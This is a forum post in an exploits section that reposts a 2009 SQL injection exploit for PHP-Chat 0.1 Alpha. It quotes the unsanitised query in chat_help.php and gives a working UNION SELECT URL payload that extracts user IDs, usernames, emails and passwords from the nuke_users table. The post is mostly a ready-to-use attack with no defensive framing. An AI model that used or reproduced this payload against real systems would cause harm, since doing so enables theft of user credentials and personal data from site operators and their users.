Jump to content
ZeroCold

PHP-Chat 0.1 Alpha SQL Injection

By ZeroCold, in Exploituri

Recommended Posts

ZeroCold Newbie

ZeroCold

Posted
Posted

PHP-Chat 0.1 Alpha SQL Injection

/////////////////////////////////////////////////////////////////
// R00TSECURITY.ORG - YOUR SECURITY COMMUNITY 
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// [2009-09-22] PHP-Chat 0.1 Alpha SQL Injection
// http://r00tsecurity.org/db/exploits/290
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// GENERATED ON: 2009-12-01 | 00:46:38
/////////////////////////////////////////////////////////////////


EXPLOIT INFO
PHP-Chat is based purely on PHP/MySQL which means I don\\\'t use any other technology such as Java or Javascript.The Chat will be released as both a stand-alone and a PHP-Nuke version.

http://sourceforge.net/projects/php-chat

The exploit is located in the file chat_help.php where the $HTTP_GET_VARS[command] is passed directly to mysql without first sanitizing it 
[]
$query = \\\"SELECT * FROM `\\\" . $table_prefix . \\\"chathelp` WHERE `id` = \\\'$HTTP_GET_VARS[command]\\\' LIMIT 1\\\";
$result = mysql_query($query) or die(\\\"$query failed!\\\");
$row = mysql_fetch_row($result);
[]

EXPLOIT
http://www.site.com/php-chat/chat_help.php?command=-1\\\'+UNION+SELECT+1,concat(user_id,username,user_email,user_password),3,4+FROM+nuke_users/*

// http://r00tsecurity.org/db/exploits/290

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...